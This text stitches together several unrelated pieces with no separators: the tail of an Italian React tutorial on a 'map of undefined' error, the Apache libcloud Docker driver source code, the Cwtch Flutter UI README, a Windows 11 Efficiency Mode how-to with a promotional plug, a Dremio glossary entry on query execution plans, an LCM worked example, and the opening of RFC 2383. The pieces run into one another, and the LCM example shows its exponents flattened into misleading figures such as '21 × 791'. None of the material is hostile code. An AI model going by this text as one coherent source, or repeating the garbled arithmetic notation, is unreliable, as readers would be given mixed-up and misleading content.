È anche possibile utilizzare l’operatore di concatenamento opzionale (?.) introdotto in ES2020. Questo operatore permette di accedere in modo sicuro a proprietà o metodi, come il metodo map di un array, senza che venga lanciato un errore se l’array è indefinito.
Ecco un esempio di componente funzionale che utilizza l’operatore di concatenamento per controllare la variabile di stato myList:
function MyComponent() {
const [myList, setMyList] = useState();
return (
<div>
{myList?.map((item) => (
<p>{item}</p>
))}
</div>
);
}
Nell’esempio precedente, state utilizzando l’operatore di concatenamento opzionale per accedere alla variabile dell’array myList in modo sicuro. Se myList è indefinito, non verrà visualizzato nulla. Se myList è definito, verrà richiamato il metodo map e gli elementi dell’elenco verranno renderizzati.
Ti sei mai chiesto cosa provoca questo errore in React? Di solito si verifica quando si utilizza il metodo map su un valore non definito o nullo. Ecco una guida passo-passo su come risolverlo 💡 Clicca per twittare
Summary
The "TypeError: Cannot Read Property 'Map' of Undefined" error can occur in React when you use the map method on an undefined or null value.
We have covered three solutions for fixing this error. However, using comparison operators is the most versatile solution because it can handle situations where the API might send an empty response or a null value.
Also, if you are not sure the data you receive is an array, you can add some checks to verify and convert the data type before calling the map method.
Check out Kinsta's Application Hosting and start your next React project today!
Now it's your turn: have you ever run into this issue? How did you solve it? Are there other approaches you have used that were not covered in this article? Let us know in the comments!
Source code for libcloud.container.drivers.docker
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import datetime
import shlex
import re
try:
import simplejson as json
except:
import json
from libcloud.utils.py3 import httplib
from libcloud.utils.py3 import b
from libcloud.common.base import JsonResponse, ConnectionUserAndKey
from libcloud.common.types import InvalidCredsError
from libcloud.container.base import (Container, ContainerDriver,
ContainerImage)
from libcloud.container.providers import Provider
from libcloud.container.types import ContainerState
VALID_RESPONSE_CODES = [httplib.OK, httplib.ACCEPTED, httplib.CREATED,
httplib.NO_CONTENT]
class DockerResponse(JsonResponse):
    valid_response_codes = [httplib.OK, httplib.ACCEPTED, httplib.CREATED,
                            httplib.NO_CONTENT]

    def parse_body(self):
        if len(self.body) == 0 and not self.parse_zero_length_body:
            return self.body

        try:
            # error responses are tricky in Docker. Eg response could be
            # an error, but response status could still be 200
            content_type = self.headers.get('content-type',
                                            'application/json')
            if content_type == 'application/json' or content_type == '':
                if self.headers.get('transfer-encoding') == 'chunked':
                    body = [json.loads(chunk) for chunk in
                            self.body.strip().replace('\r', '').split('\n')]
                else:
                    body = json.loads(self.body)
            else:
                body = self.body
        except ValueError:
            m = re.search('Error: (.+?)"', self.body)
            if m:
                error_msg = m.group(1)
                raise Exception(error_msg)
            else:
                raise Exception(
                    'ConnectionError: Failed to parse JSON response')
        return body

    def parse_error(self):
        if self.status == 401:
            raise InvalidCredsError('Invalid credentials')
        return self.body

    def success(self):
        return self.status in self.valid_response_codes


class DockerException(Exception):

    def __init__(self, code, message):
        self.code = code
        self.message = message
        self.args = (code, message)

    def __str__(self):
        return "%s %s" % (self.code, self.message)

    def __repr__(self):
        return "DockerException %s %s" % (self.code, self.message)


class DockerConnection(ConnectionUserAndKey):
    responseCls = DockerResponse
    timeout = 60

    def add_default_headers(self, headers):
        """
        Add parameters that are necessary for every request
        If user and password are specified, include a base http auth header
        """
        headers['Content-Type'] = 'application/json'
        if self.user_id and self.key:
            user_b64 = base64.b64encode(b('%s:%s' % (self.user_id, self.key)))
            headers['Authorization'] = 'Basic %s' % (user_b64.decode('utf-8'))
        return headers
[docs]class DockerContainerDriver(ContainerDriver): """ Docker container driver class. >>> from libcloud.container.providers import get_driver >>> driver = get_driver('docker') >>> conn = driver(host='198.61.239.128', port=4243) >>> conn.list_containers() or connecting to http basic auth protected https host: >>> conn = driver('user', 'pass', host='https://198.61.239.128', port=443) connect with tls authentication, by providing a hostname, port, a private key file (.pem) and certificate (.pem) file >>> conn = driver(host='https://198.61.239.128', >>> port=4243, key_file='key.pem', cert_file='cert.pem') """ type = Provider.DOCKER name = 'Docker' website = 'http://docker.io' connectionCls = DockerConnection supports_clusters = False version = '1.24' def __init__(self, key=None, secret=None, secure=False, host='localhost', port=4243, key_file=None, cert_file=None): """ :param key: API key or username to used (required) :type key: ``str`` :param secret: Secret password to be used (required) :type secret: ``str`` :param secure: Whether to use HTTPS or HTTP. Note: Some providers only support HTTPS, and it is on by default. :type secure: ``bool`` :param host: Override hostname used for connections. :type host: ``str`` :param port: Override port used for connections. :type port: ``int`` :param key_file: Path to private key for TLS connection (optional) :type key_file: ``str`` :param cert_file: Path to public key for TLS connection (optional) :type cert_file: ``str`` :return: ``None`` """ super(DockerContainerDriver, self).__init__(key=key, secret=secret, secure=secure, host=host, port=port, key_file=key_file, cert_file=cert_file) if host.startswith('https://'): secure = True # strip the prefix prefixes = ['http://', 'https://'] for prefix in prefixes: if host.startswith(prefix): host = host.strip(prefix) if key_file or cert_file: # docker tls authentication- # https://docs.docker.com/articles/https/ # We pass two files, a key_file with the # private key and cert_file with the certificate # libcloud will handle them through LibcloudHTTPSConnection if not (key_file and cert_file): raise Exception( 'Needs both private key file and ' 'certificate file for tls authentication') self.connection.key_file = key_file self.connection.cert_file = cert_file self.connection.secure = True else: self.connection.secure = secure self.connection.host = host self.connection.port = port
[docs] def install_image(self, path): """ Install a container image from a remote path. :param path: Path to the container image :type path: ``str`` :rtype: :class:`libcloud.container.base.ContainerImage` """ payload = { } data = json.dumps(payload) result = self.connection.request('/v%s/images/create?fromImage=%s' % (self.version, path), data=data, method='POST') if "errorDetail" in result.body: raise DockerException(None, result.body) image_id = None # the response is slightly different if the image is already present # and it's not downloaded. both messages below indicate that the image # is available for use to the daemon if re.search(r'Downloaded newer image', result.body) or \ re.search(r'"Status: Image is up to date', result.body): if re.search(r'sha256:(?P<id>[a-z0-9]{64})', result.body): image_id = re.findall(r'sha256:(?P<id>[a-z0-9]{64})', result.body)[-1] # if there is a failure message or if there is not an image id in the # response then throw an exception. if image_id is None: raise DockerException(None, 'failed to install image') image = ContainerImage( id=image_id, name=path, path=path, version=None, driver=self.connection.driver, extra={}) return image
[docs] def list_images(self): """ List the installed container images :rtype: ``list`` of :class:`libcloud.container.base.ContainerImage` """ result = self.connection.request('/v%s/images/json' % (self.version)).object images = [] for image in result: try: name = image.get('RepoTags')[0] except: name = image.get('Id') images.append(ContainerImage( id=image.get('Id'), name=name, path=name, version=None, driver=self.connection.driver, extra={ "created": image.get('Created'), "size": image.get('Size'), "virtual_size": image.get('VirtualSize'), }, )) return images
[docs] def list_containers(self, image=None, all=True): """ List the deployed container images :param image: Filter to containers with a certain image :type image: :class:`libcloud.container.base.ContainerImage` :param all: Show all container (including stopped ones) :type all: ``bool`` :rtype: ``list`` of :class:`libcloud.container.base.Container` """ if all: ex = '?all=1' else: ex = '' try: result = self.connection.request( "/v%s/containers/json%s" % (self.version, ex)).object except Exception as exc: errno = getattr(exc, 'errno', None) if errno == 111: raise DockerException( errno, 'Make sure docker host is accessible' 'and the API port is correct') raise containers = [self._to_container(value) for value in result] return containers
[docs] def deploy_container(self, name, image, parameters=None, start=True, command=None, hostname=None, user='', stdin_open=True, tty=True, mem_limit=0, ports=None, environment=None, dns=None, volumes=None, volumes_from=None, network_disabled=False, entrypoint=None, cpu_shares=None, working_dir='', domainname=None, memswap_limit=0, port_bindings=None, network_mode='bridge', labels=None): """ Deploy an installed container image For details on the additional parameters see : http://bit.ly/1PjMVKV :param name: The name of the new container :type name: ``str`` :param image: The container image to deploy :type image: :class:`libcloud.container.base.ContainerImage` :param parameters: Container Image parameters :type parameters: ``str`` :param start: Start the container on deployment :type start: ``bool`` :rtype: :class:`Container` """ command = shlex.split(str(command)) if port_bindings is None: port_bindings = {} params = { 'name': name } payload = { 'Hostname': hostname, 'Domainname': domainname, 'ExposedPorts': ports, 'User': user, 'Tty': tty, 'OpenStdin': stdin_open, 'StdinOnce': False, 'Memory': mem_limit, 'AttachStdin': True, 'AttachStdout': True, 'AttachStderr': True, 'Env': environment, 'Cmd': command, 'Dns': dns, 'Image': image.name, 'Volumes': volumes, 'VolumesFrom': volumes_from, 'NetworkDisabled': network_disabled, 'Entrypoint': entrypoint, 'CpuShares': cpu_shares, 'WorkingDir': working_dir, 'MemorySwap': memswap_limit, 'PublishAllPorts': True, 'PortBindings': port_bindings, 'NetworkMode': network_mode, 'Labels': labels, } data = json.dumps(payload) try: result = self.connection.request('/v%s/containers/create' % (self.version), data=data, params=params, method='POST') except Exception as e: message = e.message or str(e) if message.startswith('No such image:'): raise DockerException(None, 'No such image: %s' % image.name) else: raise DockerException(None, e) id_ = result.object['Id'] payload = { 'Binds': [], 'PublishAllPorts': True, 'PortBindings': port_bindings, } data = json.dumps(payload) if start: result = self.connection.request( '/v%s/containers/%s/start' % (self.version, id_), data=data, method='POST') return self.get_container(id_)
[docs] def get_container(self, id): """ Get a container by ID :param id: The ID of the container to get :type id: ``str`` :rtype: :class:`libcloud.container.base.Container` """ result = self.connection.request("/v%s/containers/%s/json" % (self.version, id)).object return self._to_container(result)
[docs] def start_container(self, container): """ Start a container :param container: The container to be started :type container: :class:`libcloud.container.base.Container` :return: The container refreshed with current data :rtype: :class:`libcloud.container.base.Container` """ payload = { 'Binds': [], 'PublishAllPorts': True, } data = json.dumps(payload) result = self.connection.request( '/v%s/containers/%s/start' % (self.version, container.id), method='POST', data=data) if result.status in VALID_RESPONSE_CODES: return self.get_container(container.id) else: raise DockerException(result.status, 'failed to start container')
[docs] def stop_container(self, container): """ Stop a container :param container: The container to be stopped :type container: :class:`libcloud.container.base.Container` :return: The container refreshed with current data :rtype: :class:`libcloud.container.base.Container` """ result = self.connection.request('/v%s/containers/%s/stop' % (self.version, container.id), method='POST') if result.status in VALID_RESPONSE_CODES: return self.get_container(container.id) else: raise DockerException(result.status, 'failed to stop container')
[docs] def restart_container(self, container): """ Restart a container :param container: The container to be stopped :type container: :class:`libcloud.container.base.Container` :return: The container refreshed with current data :rtype: :class:`libcloud.container.base.Container` """ data = json.dumps({'t': 10}) # number of seconds to wait before killing the container result = self.connection.request('/v%s/containers/%s/restart' % (self.version, container.id), data=data, method='POST') if result.status in VALID_RESPONSE_CODES: return self.get_container(container.id) else: raise DockerException(result.status, 'failed to restart container')
[docs] def destroy_container(self, container): """ Remove a container :param container: The container to be destroyed :type container: :class:`libcloud.container.base.Container` :return: True if the destroy was successful, False otherwise. :rtype: ``bool`` """ result = self.connection.request('/v%s/containers/%s' % (self.version, container.id), method='DELETE') return result.status in VALID_RESPONSE_CODES
[docs] def ex_list_processes(self, container): """ List processes running inside a container :param container: The container to list processes for. :type container: :class:`libcloud.container.base.Container` :rtype: ``str`` """ result = self.connection.request("/v%s/containers/%s/top" % (self.version, container.id)).object return result
[docs] def ex_rename_container(self, container, name): """ Rename a container :param container: The container to be renamed :type container: :class:`libcloud.container.base.Container` :param name: The new name :type name: ``str`` :rtype: :class:`libcloud.container.base.Container` """ result = self.connection.request('/v%s/containers/%s/rename?name=%s' % (self.version, container.id, name), method='POST') if result.status in VALID_RESPONSE_CODES: return self.get_container(container.id)
[docs] def ex_get_logs(self, container, stream=False): """ Get container logs If stream == True, logs will be yielded as a stream From Api Version 1.11 and above we need a GET request to get the logs Logs are in different format of those of Version 1.10 and below :param container: The container to list logs for :type container: :class:`libcloud.container.base.Container` :param stream: Stream the output :type stream: ``bool`` :rtype: ``bool`` """ payload = {} data = json.dumps(payload) if float(self._get_api_version()) > 1.10: result = self.connection.request( "/v%s/containers/%s/logs?follow=%s&stdout=1&stderr=1" % (self.version, container.id, str(stream))).object logs = result else: result = self.connection.request( "/v%s/containers/%s/attach?logs=1&stream=%s&stdout=1&stderr=1" % (self.version, container.id, str(stream)), method='POST', data=data) logs = result.body return logs
[docs] def ex_search_images(self, term): """Search for an image on Docker.io. Returns a list of ContainerImage objects >>> images = conn.ex_search_images(term='mistio') >>> images [<ContainerImage: id=rolikeusch/docker-mistio...>, <ContainerImage: id=mist/mistio, name=mist/mistio, driver=Docker ...>] :param term: The search term :type term: ``str`` :rtype: ``list`` of :class:`libcloud.container.base.ContainerImage` """ term = term.replace(' ', '+') result = self.connection.request('/v%s/images/search?term=%s' % (self.version, term)).object images = [] for image in result: name = image.get('name') images.append( ContainerImage( id=name, path=name, version=None, name=name, driver=self.connection.driver, extra={ "description": image.get('description'), "is_official": image.get('is_official'), "is_trusted": image.get('is_trusted'), "star_count": image.get('star_count'), }, )) return images
[docs] def ex_delete_image(self, image): """ Remove image from the filesystem :param image: The image to remove :type image: :class:`libcloud.container.base.ContainerImage` :rtype: ``bool`` """ result = self.connection.request('/v%s/images/%s' % (self.version, image.name), method='DELETE') return result.status in VALID_RESPONSE_CODES
def _to_container(self, data): """ Convert container in Container instances """ try: name = data.get('Name').strip('/') except: try: name = data.get('Names')[0].strip('/') except: name = data.get('Id') state = data.get('State') if isinstance(state, dict): status = data.get( 'Status', state.get('Status') if state is not None else None) else: status = data.get('Status') if 'Exited' in status: state = ContainerState.STOPPED elif status.startswith('Up '): state = ContainerState.RUNNING else: state = ContainerState.STOPPED image = data.get('Image') ports = data.get('Ports', []) created = data.get('Created') if isinstance(created, float): created = ts_to_str(created) extra = { 'id': data.get('Id'), 'status': data.get('Status'), 'created': created, 'image': image, 'ports': ports, 'command': data.get('Command'), 'sizerw': data.get('SizeRw'), 'sizerootfs': data.get('SizeRootFs'), } ips = [] if ports is not None: for port in ports: if port.get('IP') is not None: ips.append(port.get('IP')) return Container( id=data['Id'], name=name, image=ContainerImage( id=data.get('ImageID', None), path=image, name=image, version=None, driver=self.connection.driver ), ip_addresses=ips, state=state, driver=self.connection.driver, extra=extra) def _get_api_version(self): """ Get the docker API version information """ result = self.connection.request('/version').object result = result or {} api_version = result.get('ApiVersion') return api_version
def ts_to_str(timestamp):
    """
    Return a timestamp as a nicely formated datetime string.
    """
    date = datetime.datetime.fromtimestamp(timestamp)
    date_string = date.strftime("%d/%m/%Y %H:%M %Z")
    return date_string
cwtch-ui/README.md
# Cwtch UI
A Flutter based [Cwtch](https://cwtch.im) UI.
This README covers build instructions, for information on Cwtch itself please go to [https://cwtch.im](https://cwtch.im)
## Installing
- Android: Available from the Google Play Store (currently patrons only) or from [https://cwtch.im/download/](https://cwtch.im/download/) as an APK
- Windows: Available from [https://cwtch.im/download/](https://cwtch.im/download/) as an installer or .zip file
- Linux: Available from [https://cwtch.im/download/](https://cwtch.im/download/) as a .tar.gz
- `install.home.sh` installs the app into your home directory
- `install.sys.sh` as root to install system wide
- or run out of the unzipped directory
- MacOS: Available from [https://cwtch.im/download/](https://cwtch.im/download/) as a .dmg
## Running
Cwtch processes the following environment variables:
- `CWTCH_HOME=` overrides the default storage path of `~/.cwtch` with what ever you choose
- `LOG_FILE=` will reroute all of libcwtch-go's logging to the specified file instead of the console
- `LOG_LEVEL=debug` will set the log level to debug instead of info
## Building
### Getting Started
First you will need a valid [flutter sdk installation](https://flutter.dev/docs/get-started/install).
You will probably want to disable Analytics on the Flutter Tool: `flutter config --no-analytics`
This project uses the flutter `stable` channel
Once flutter is set up, run `flutter pub get` from this project folder to fetch dependencies.
By default a development version is built, which loads profiles from `$CWTCH_HOME/dev/`. This is so that you can build
and test development builds with alternative profiles while running a release/stable version of Cwtch uninterrupted.
To build a release version and load normal profiles, use `build-release.sh X` instead of `flutter build X`
### Building on Linux (for Linux)
- copy `libCwtch-go.so` to `linux/`, or run `fetch-libcwtch-go.sh` to download it
- set `LD_LIBRARY_PATH="$PWD/linux"`
- copy a `tor` binary to `linux/` or run `fetch-tor.sh` to download one
- run `flutter config --enable-linux-desktop` if you've never done so before
- optional: launch cwtch-ui debug build by running `flutter run -d linux`
- to build cwtch-ui, run `flutter build linux`
- optional: launch cwtch-ui release build with `env LD_LIBRARY_PATH=linux ./build/linux/x64/release/bundle/cwtch`
- to package the build, run `linux/package-release.sh`
### Building on Windows (for Windows)
- copy `libCwtch.dll` to `windows/`, or run `fetch-libcwtch-go.ps1` to download it
- run `fetch-tor-win.ps1` to fetch Tor for windows
- optional: launch cwtch-ui debug build by running `flutter run -d windows`
- to build cwtch-ui, run `flutter build windows`
- optional: to run the release build:
- `cp windows/libCwtch.dll .`
- `./build/windows/runner/Release/cwtch.exe`
### Building on Linux/Windows (for Android)
- Follow the steps above to fetch `libCwtch-go` and `tor` (these will fetch Android versions of these binaries also)
- run `flutter run` with an Android phone connect via USB (or some other valid debug mode)
### Building on MacOS
- CocoaPods is required, you may need to `gem install cocoapods -v 1.9.3`
- copy `libCwtch.x64.dylib` and `libCwtch.arm.dylib` into the root folder, or run `fetch-libcwtch-go-macos.sh` to download them
- run `fetch-tor-macos.sh` to fetch Tor or Download and install Tor Browser and `cp -r /Applications/Tor\ Browser.app/Contents/MacOS/Tor ./macos/`
- `flutter build macos`
- optional: launch cwtch-ui release build with `./build/macos/Build/Products/Release/Cwtch.app/Contents/MacOS/Cwtch`
- To package the UI: `./macos/package-release.sh`, which results in a Cwtch.dmg that has libCwtch.dylib and tor in it as well and can be installed into Applications
### Known Platform Issues
- **Windows**: Flutter engine has a [known bug](https://github.com/flutter/flutter/issues/75675) around the Right Shift key being sticky.
We have implemented a partial workaround, if this happens, tap left shift and it will reset.
## l10n Instructions
### Adding a new string
Strings are managed directly from our Lokalise(url?) project.
Keys should be valid Dart variable names in lowerCamelCase.
After adding a new key and providing/obtaining translations for it, follow the next step to update your local copy.
### Updating translations
Only Open Privacy staff members can update translations.
In Lokalise, hit Download and make sure:
* Format is set to "Flutter (.arb)"
* Output filename is set to `l10n/intl_%LANG_ISO%.%FORMAT%`
* Empty translations is set to "Replace with base language"
* Order "Last Update"
Build, download and unzip the output, overwriting `lib/l10n`. The next time Flwtch is built, Flutter will notice the changes and update `app_localizations.dart` accordingly (thanks to `generate:true` in `pubspec.yaml`).
### Adding a language
If a new language has been added to the Lokalise project, two additional manual steps need to be done:
* Create a new key called `localeXX` for the name of the language
* Add it to the settings pane by updating `getLanguageFull()` in `lib/views/globalsettingsview.dart`
Then rebuild as normal.
### Using a string
Any widget underneath the main MaterialApp should be able to:
```
import 'package:flutter_gen/gen_l10n/app_localizations.dart';
```
and then use:
```
Text(AppLocalizations.of(context)!.stringIdentifer),
```
### Configuration
With `generate: true` in `pubspec.yaml`, the Flutter build process checks `l10n.yaml` for input/output filenames.
How To Use Efficiency Mode In Windows 11 To Reduce Resource Utilization
A new Windows 11 feature called Task Manager Efficiency Mode is intended to reduce the system resources consumed by background processes that are idle or not actively used by applications. When idle processes keep consuming resources, fewer resources are left for the programs that need them, which results in slower foreground responsiveness, shorter battery life, louder fan noise, and higher temperatures.
In this post, we'll look at how to use Windows 11's Efficiency Mode to save resources. The feature is part of the Windows 11 2022 update (version 22H2) and is accessible in the new Task Manager.
What Is Windows Task Manager’s Efficiency Mode?
Efficiency Mode is a new feature in Windows 11 that lets users run idle background tasks at low priority and with reduced CPU power, in order to improve foreground responsiveness, extend battery life, cut fan noise, and reduce CPU stress. It resembles the Eco mode found in Windows 10; both are part of Microsoft's Sustainable Software initiative. Efficiency Mode addresses the problem by lowering the CPU priority and power consumption of specific processes. It also helps you spot applications that may already be running in efficiency mode, such as Microsoft Edge, which does so by default.
Also Read: How to Change the Task Manager Default Start Page on Windows 11
How To Use Efficiency Mode In Windows 11 To Reduce Resource Utilization
Every Windows process has a "priority," which is used to assess its importance and to determine how much CPU time is allotted to it. To avoid interfering with other running processes that have a higher priority, Efficiency Mode lowers a process's base priority. Efficiency Mode also places the process in "EcoQoS" mode to allow for more power-efficient operation. Under EcoQoS the process runs at the lowest CPU power, which keeps "thermal headroom" available for other, more important work that must be carried out first.
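If you want to approximate the base-priority half of this behavior from a script, the short Python sketch below uses the third-party psutil package (install it with pip) to drop a process to Windows' idle priority class. This is only an illustration: it does not enable EcoQoS power throttling, and the process name notepad.exe is just a placeholder for whatever background process you want to deprioritize.

import psutil

TARGET_NAME = "notepad.exe"  # placeholder; pick the process you want to demote

for proc in psutil.process_iter(["name"]):
    # Compare names case-insensitively; process_iter pre-fetches the "name" field.
    if proc.info["name"] and proc.info["name"].lower() == TARGET_NAME:
        try:
            # IDLE_PRIORITY_CLASS is a Windows-only psutil constant.
            proc.nice(psutil.IDLE_PRIORITY_CLASS)
            print("Lowered priority of PID", proc.pid)
        except (psutil.AccessDenied, psutil.NoSuchProcess) as err:
            print("Could not adjust PID", proc.pid, "-", err)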
The following describes how to activate Efficiency Mode on your Windows 11 PC:
Step 1: Open Task Manager.
Step 2: Switch to the Processes tab.
Step 3: Expand the process tree for the application in question by pressing the expand/collapse (>) symbol.
Step 4: Choose a process, then select Efficiency Mode from the Task Manager window's top menu. Alternatively, you can right-click the relevant process and choose Efficiency Mode.
Step 5: In the confirmation window that appears, select the Turn on Efficiency mode button.
Step 6: Efficiency Mode will then be enabled for the chosen process.
The “Status” column will show you which processes are employing the Efficiency Mode. Processes that have this feature turned on will have the label “Efficiency Mode” next to them. If any of its child processes have Efficiency Mode enabled, the parent process will likewise display a leaf icon.
The Efficiency Mode option may be disabled for specific operations. These are fundamental Windows functions, and altering their default priority may have a severe effect on your computer.
Also Read: Task Manager not Working on Windows 11? Here’s the Fix!
Advanced System Optimizer – Fasten Your PC
Advanced System Optimizer is the best program for cleaning up computer junk. It provides a quick, cost-effective answer to your Windows optimization requirements. This best PC cleaner may assist you in maintaining your privacy by deleting cookies and browsing history, encrypting sensitive data to keep it safe from prying eyes, and completely removing data. In addition to recovering lost data, backup copies of important data, such as movies, music files, pictures, and documents, are also created.
Periodically, your computer has to be optimized and maintained. You can accomplish this by using Advanced System Optimizer and automatically setting up a PC checkup. Thus, you won’t require a prompt to launch the application.
Also Read: Improve Windows Performance With Advanced System Optimizer
The Final Word On How To Use Efficiency Mode In Windows 11 To Reduce Resource Utilization
The purpose of efficiency mode is to lessen CPU strain and increase battery life on Windows 11 devices. The performance of your system may be enhanced if some of the background processes that are idle are switched to efficiency mode.
Please let us know in the comments below if you have any questions or recommendations. We would be delighted to provide you with a resolution. We frequently publish advice, tricks, and solutions to common tech-related problems.
Suggested Reading:
What Is Conhost.Exe And Why Is It Running In My Task Manager
How To Fix Windows 10 Task Manager Not Responding
How To Kill Unresponsive Programs Without Task Manager
How to Make the Most of Windows Task Manager?
Windows 11’s Task Manager is soon going to get a Search Bar feature
Query Execution Plan
What is Query Execution Plan?
A Query Execution Plan is a detailed blueprint that outlines the steps and strategies for executing a database query. It is generated by the database's query optimizer and provides a roadmap for how the query will be processed, including the order in which tables will be accessed, the join operations to be performed, and the selection and aggregation methods to be used.
How Query Execution Plan Works
When a query is submitted to a database, the query optimizer analyzes the query and generates a Query Execution Plan. The optimizer considers factors such as the available indexes, statistics about the data, and the complexity of the query to determine the most efficient execution plan.
The Query Execution Plan is typically represented as a tree-like structure, with each node representing a step or operation in the execution process. The optimizer assigns cost estimates to each operation, allowing it to compare different plans and choose the one with the lowest overall cost.
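As a small, self-contained illustration of what an optimizer reports, the Python sketch below asks SQLite (used here only because it ships with Python, not because it is a lakehouse engine) for its plan via EXPLAIN QUERY PLAN. The table, index, and query are invented for the example.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE orders (id INTEGER PRIMARY KEY, customer_id INTEGER, total REAL)")
conn.execute("CREATE INDEX idx_orders_customer ON orders (customer_id)")

# Ask the optimizer how it would execute the query, without running it.
plan = conn.execute(
    "EXPLAIN QUERY PLAN "
    "SELECT customer_id, SUM(total) FROM orders "
    "WHERE customer_id = 42 GROUP BY customer_id"
).fetchall()

for step in plan:
    # Each row is one step of the plan; the last column is a readable detail,
    # typically showing that idx_orders_customer is used to search the table.
    print(step)

Reading the plan this way is the same habit you apply at larger scale: check which access paths and join strategies the engine chose before trusting a slow query in production.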
Why Query Execution Plan is Important
Query Execution Plans play a crucial role in optimizing query performance and improving overall database efficiency. By analyzing the plan, database administrators and developers can identify potential bottlenecks, optimize queries, and make informed decisions on index creation, schema design, and query optimization techniques.
Understanding the Query Execution Plan can help identify inefficient queries, unnecessary joins, missing indexes, and costly operations, leading to significant performance improvements.
The Most Important Query Execution Plan Use Cases
• Performance Optimization: Query Execution Plans can help identify slow queries and optimize them for better performance.
• Index Creation: By analyzing the plan, administrators can identify missing indexes and create them to improve query speed.
• Schema Design: Query Execution Plans provide insights into the database schema design and can help optimize it for specific queries.
• Query Tuning: By understanding the execution plan, developers can tune queries to improve performance and resource utilization.
Other Technologies or Terms Related to Query Execution Plan
Some related terms and technologies to Query Execution Plan include:
• Query Optimization: The process of selecting and organizing the best execution plan for a given query.
• Database Indexes: Data structures that improve query performance by enabling faster data retrieval.
• Database Statistics: Information about the data distribution and characteristics used by the optimizer to make execution plan decisions.
• Query Rewriting: The process of transforming a query into an equivalent but more efficient form.
• Cost-based Optimization: An optimization technique that estimates the cost of executing different plans and selects the one with the lowest cost.
Why Dremio Users Would Be Interested in Query Execution Plan
Dremio users would be interested in Query Execution Plan as it provides valuable insights into the performance and optimization of their data lakehouse environment. By understanding the execution plan, Dremio users can identify bottlenecks, optimize queries, and improve overall system performance.
Dremio vs. Query Execution Plan
Dremio is a powerful data lakehouse platform that provides additional capabilities beyond Query Execution Plan. While Query Execution Plan focuses on optimizing individual queries, Dremio offers a comprehensive set of tools for data discovery, self-service analytics, and data engineering. Dremio enables users to explore, analyze, and transform data from a variety of sources, including data lakes, databases, and cloud storage platforms.
Furthermore, Dremio integrates Query Execution Plan information within its platform, allowing users to access and analyze the plans alongside their data workflows. This integration provides a seamless experience for optimizing and analyzing query performance within the broader context of data exploration and analysis.
What is the Least Common Multiple of 158 and 170?
The least common multiple, which also serves as the lowest common denominator (LCD), can be calculated in two ways: with the LCM formula based on the greatest common factor (GCF), or by multiplying the prime factors with the highest exponents.
Least common multiple (LCM) of 158 and 170 is 13430.
LCM(158,170) = 13430
Least Common Multiple of 158 and 170 with GCF Formula
The formula of LCM is LCM(a,b) = ( a × b) / GCF(a,b).
We need to calculate the greatest common factor of 158 and 170, then apply it in the LCM equation.
GCF(158,170) = 2
LCM(158,170) = ( 158 × 170) / 2
LCM(158,170) = 26860 / 2
LCM(158,170) = 13430
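The same calculation is easy to check programmatically. For example, a few lines of Python reproduce the GCF formula above using math.gcd (Python 3.9 and later also provide math.lcm directly):

import math

a, b = 158, 170
gcf = math.gcd(a, b)      # 2
lcm = (a * b) // gcf      # 26860 / 2 = 13430
print(gcf, lcm)           # prints: 2 13430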
Least Common Multiple (LCM) of 158 and 170 with Primes
Least common multiple can be found by multiplying the highest exponent prime factors of 158 and 170. First we will calculate the prime factors of 158 and 170.
Prime Factorization of 158
Prime factors of 158 are 2, 79. Prime factorization of 158 in exponential form is:
158 = 21 × 791
Prime Factorization of 170
Prime factors of 170 are 2, 5, 17. Prime factorization of 170 in exponential form is:
170 = 21 × 51 × 171
Now multiplying the highest exponent prime factors to calculate the LCM of 158 and 170.
LCM(158,170) = 21 × 791 × 51 × 171
LCM(158,170) = 13430
RFC 2383
Network Working Group M. Suzuki
Request for Comments: 2383 NTT
Category: Informational August 1998
ST2+ over ATM
Protocol Specification - UNI 3.1 Version
Status of this Memo
This memo provides information for the Internet community. It does
not specify an Internet standard of any kind. Distribution of this
memo is unlimited.
Copyright Notice
Copyright (C) The Internet Society (1998). All Rights Reserved.
Abstract
This document specifies an ATM-based protocol for communication
between ST2+ agents. The ST2+ over ATM protocol supports the matching
of one hop in an ST2+ tree-structure stream with one ATM connection.
In this document, ATM is a subnet technology for the ST2+ stream.
The ST2+ over ATM protocol is designed to achieve resource-
reservation communications across ATM and non-ATM networks, to extend
the UNI 3.1/4.0 signaling functions, and to reduce the UNI 4.0 LIJ
signaling limitations.
The specifications of the ST2+ over ATM protocol consist of a
revision of RFC 1819 ST2+ and specifications of protocol interaction
between ST2+ and ATM on the user plane, management plane, and control
plane which correspond to the three planes of the B-ISDN protocol
reference model.
1. Introduction
1.1 Purpose of Document
The purpose of this document is to specify an ATM-based protocol for
communication between ST2+ agents.
The ST2+ over ATM protocol is designed to support the matching of one
hop in an ST2+ tree-structure stream with one ATM connection; it is
not designed to support an entire ST2+ tree-structure stream with a
point-to-multipoint ATM connection only.
Suzuki Informational [Page 1]
RFC 2383 ST2+ over ATM August 1998

   Therefore, in this document, ATM is only a subnet technology for the
   ST2+ stream. This specification is designed to enable resource-
   reservation communications across ATM and non-ATM networks.

1.2 Features of ST2+ over ATM Protocol

   o Enables resource-reservation communications across ATM and non-ATM
     networks.

     ATM native API supports resource-reservation communications only
     within an ATM network; it cannot support interworking with non-ATM
     networks. This is because

     - ATM native API cannot connect terminals without an ATM interface.

     - ATM native API does not support IP addressing and SAP (port)
       addressing systems.

   o Extends UNI 3.1/4.0 signaling functions.

     ST2+ SCMP supports MTU-size negotiation at all hops in an ST2+
     tree-structure stream. UNI 3.1/4.0 supports only max CPCS_SDU
     (i.e., MTU) negotiation with the called party of a point-to-point
     call or with the first leaf of a point-to-multipoint call.

   o Reduces UNI 4.0 LIJ signaling limitations.

     The ST2+ over ATM protocol supports UNI 4.0 LIJ Call Identifier
     notification from the root to the leaf by using an ST2+ SCMP
     extension. LIJ Call Identifier discovery at the leaf is one of the
     major unsolved problems of UNI 4.0, and the ST2+ over ATM protocol
     provides a solution.

     Note: The UNI 3.1 version of the ST2+ over ATM protocol does not
     support the above feature. It will be supported by the UNI 3.1/4.0
     version.

1.3 Goals and Non-goals of ST2+ over ATM Protocol

